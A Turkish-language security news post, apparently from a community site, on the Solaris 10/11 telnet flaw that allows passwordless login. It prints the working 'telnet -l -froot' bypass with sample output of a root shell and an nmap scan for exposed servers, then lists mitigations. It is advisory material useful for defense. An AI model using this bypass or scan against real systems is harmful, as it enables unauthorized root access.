Solaris Sistemlerde Ciddi Güvenlik Açığı

0
FZ
Dün yayınlanan ve sadece Sun Solaris 10, Solaris 11 işletim sistemlerini etkileyen güvenlik açığı telnet servisine herhangi bir sistem kullanıcısının parolasız bağlanabilmesini sağlıyor. Eğer root kullanıcısının telnet erişim yetkisi varsa bu, parolayı bilmeden sisteme tam yetkili erişilmesi manasına geliyor. Benzer bir açık 1994 yılında bazı UNIX sistemlerinde de görülmüştü.

Güvenlik açığını nasıl test edersiniz?

$telnet -l -fkullanici_adi hedef_sistem

fbsd~$ telnet -l -froot 10.1.1.1

Trying 10.1.1.1...

Connected to 10.1.1.1.

Escape character is '^]'.

[ Trying mutual KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

[ Trying KERBEROS5 (host/10.1.1.1@1.1.1)... ]

Kerberos V5: mk_req failed (No such file or directory)

Last login: Mon Feb 12 15:20:12 on console

Sun Microsystems Inc.   SunOS 5.10      Generic January 2005

Sourcing //.profile-EIS.....

root@solaris-test #

Ek olarak ağınızdaki Solaris tabanlı telnet sunucuları bulmak için nmap kullanabilirsiniz.

#nmap -sV  -p23 AĞ_Bloğunuz -oG solaris_telnet|grep "Sun Solaris"

Korunma Yolları

1) Solaris sistemden telnet servisi kapatılıp yerine daha güvenli erişim yöntemi olan SSH tercih edilebilir.

Telneti kapatmak için

solaris-test# svcadm disable telnet

2)Telnet servisi açık kalması gerekiyorsa öncelikle sisteme root kullanıcısının erişimi kısıtlanmalı. Bu en azından sisteme en yetkili hesapla bağlanılmasını engeller fakat sistemdeki diğer kullanıcıların(sys,adm, lp, vs.) sisteme parolasız erişimi hala mümkün olmaktadır.

Adım Adım telnet ile sisteme root erişimini engellemek /etc/default/login dosyası açılır. #CONSOLE=/dev/console satırı bulunur ve başındaki # kaldırılır. 3)Telnet servisine yapılan erişimler IP tabanlı kısıtlanabilir. Bunun için Solaris'de tcp_wrapper ve IPF kullanılabilir. Telnet servisi için tcp_wrapper desteğini aktif ederek telnet servisine yapılan erişimler ip/network tabanlı kısıtlamak için,

Telnet servisine için tcp_wrapper desteği verilir

#inetadm -m telnet tcp_wrappers=TRUE

ve /etc/hosts.allow, /etc/hosts.deny dosyaları kullanılarak belirli IP/ağlara erişim tanımlanır.

Huzeyfe ÖNAL - huzeyfe at enderunix.org

Görüşler

0
elrond
Şaka gibi bir açık bu. Şirkette adminlere söyledim kapatın şu rezillikleri diye inanmadılar ilk başta...

Asıl garip olan niye şimdi public oldu...
Görüş belirtmek için giriş yapın...

İlgili Yazılar

M$ Word´deki Açık Makroları Uyarı Olmadan Çalıştırıyor

Challenger

Olympos.org' da yer alan bu habere göre M$ Word' deki bir açık sayesinde, makro virüsleri, Word size bir uyarı vermeden otomatik olarak çalışabiliyor.

"Açık sayesinde bir saldırganın kötü amaçlı bir doküman hazırlayarak macro güvenlik modelini aşması mümkün oluyor. Eğer doküman açılırsa, ayarlı olan macro güvenlik ayarı ne olursa olsun ekli olan makro otomatik olarak çalışıyor. Kötü amaçlı makro dosya ekleme, değiştirme, silme, bir web sitesi ile haberleşme ve disk sürücüyü formatlama gibi kullanıcının yetkisi olduğu tüm işlemleri gerçekleştirebiliyor."

Not: Eh be Micros~1 kelime işlemciyi bile baş belası haline getirdin ya! Helal olsun!

Phrack #63

sakpolat

Merakla beklenen Phrack dergisinin 63. sayısı yayınlandı.
http://www.phrack.org

Script Kiddie ve Ötesi - Yeraltı Kültürüne Bir Bakış

FZ

AHBL güvenlik yöneticisi Andrew D. Kirch pek çok ``script kiddie´´ grubuna sızmış ve deneyimlerini Newsforge sitesi ile bir IRC röportajı şeklinde paylaşmış. Ele alınan konular arasında DDoS saldırılarını koordine etme konusunda yeni trendlerden tutun, büyük şirketlerin telekonferanslarını bloke etmeye kadar pek çok şey var.

İşte röportajdan bazı önemli alıntılar:

- Bu çocuklar sokak çetesi ile mafya karışımı bir organizasyona benzer şekilde organize oluyorlar. Yani arkadaşımın arkadaşı ilkesi.

- Bunların çoğu MyDoom´dan sonra ortaya çıktı. EMP bir süredir ortalıkta idi ancak ADP, SLiM (ki bu kişi geçenlerde NSA ve NIPC web sitelerinin yanısıra Beyaz Saray posta sunucularına da saldırdı) ve izm 10.000 bilgisayarlık ``DoSnet´´leri (açıkları bulunan sunucu listeleri, bu sunucular daha sonra DDoS saldırılarında kullanılabiliyorlar) 500$ gibi çok cüzi bir fiyata satın aldılar. DCOM bir NT açığı olduğu için -- 2000 ve XP´yi de etkiliyordu -- tüm bu makinalar IP paketlerinin tahrifatında (spoofing) kullanılabiliyor.

Anonim gezinti için Tor kullanırken dikkat!

anonim

Tor EFF'nin anonim gezinti için ücretsiz sağladığı, ticari alternatiflerinden daha gelişmiş bir yazılım. Fakat Tor kullansanız bile basit yöntemlerle kimliğiniz ortaya çıkarılabiliyor. Tor kullanırken dikkat edilmesi gerekenler şöyle sıralanmış:

RFC 3514

urxalit

Netcraft´taki habere göre 1 Nisan 2003 tarihinde yayınlanan RFC 3514 ile ipv4 paketlerine bir güvenlik biti eklenecek ve bu bitin "good" veya "evil" olmasına göre güvenlik duvarları için paketleri droplamak çok kolay ve zahmetsiz olacak.

Eğer bu RFC hayata geçerse, ABD hükümeti (haberde doğrudan ABD hükümet kuruluşları için diyor) kullandığı güvenlik duvarlarını güncelleyip basitçe, kafasını bozan "terörist" ülkelerden gelen paketleri droplayabilir. Tabi Internet trafiğinin neredeyse %80´inin ABD´de aktığı düşünülürse o ülkeye de Interneti bloklamış olur..

İngilizcesi benden iyi olan arkadaşlar belki haberi çevirebilir.